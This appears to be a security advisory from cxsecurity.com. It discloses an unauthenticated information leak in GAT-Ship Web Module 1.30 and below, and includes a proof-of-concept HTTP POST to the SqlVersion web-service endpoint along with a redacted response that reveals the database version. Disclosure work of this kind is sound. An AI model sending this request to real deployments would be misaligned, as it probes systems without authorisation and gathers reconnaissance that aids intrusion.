GAT-Ship Web Module 1.30 Information Disclosure

2019.05.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system information via a crafted request: PoC: --------------------------------------------------------------------------------------------------------------------------------------- POST /ws/gatshipWs.asmx/SqlVersion <http://gatshipWs.asmx/SqlVersion> HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json; charset=utf-8 X-Requested-With: XMLHttpRequest Content-Length: 2 DNT: 1 Connection: close {} -------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/X.X X-AspNet-Version: X.X.XXXXX X-Powered-By: ASP.NET Date: Mon, XX XXX 20XX 06:55:31 GMT Connection: close Content-Length: 310 {"d":{"__type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft SQL Server 20XX (SPX) - XX.X.XXXX.X (X64) \n\tDec 28 20XX 20:23:12 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows XX XX \u003cX64\u003e (Build XXXX: Service Pack X)\n"}} =================================================================================== Values in PoC removed for security reasons. Disclosed: 16 Jul 2018 Fix: Upgrade to current version. Discovered by Gionathan Armando Reale


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top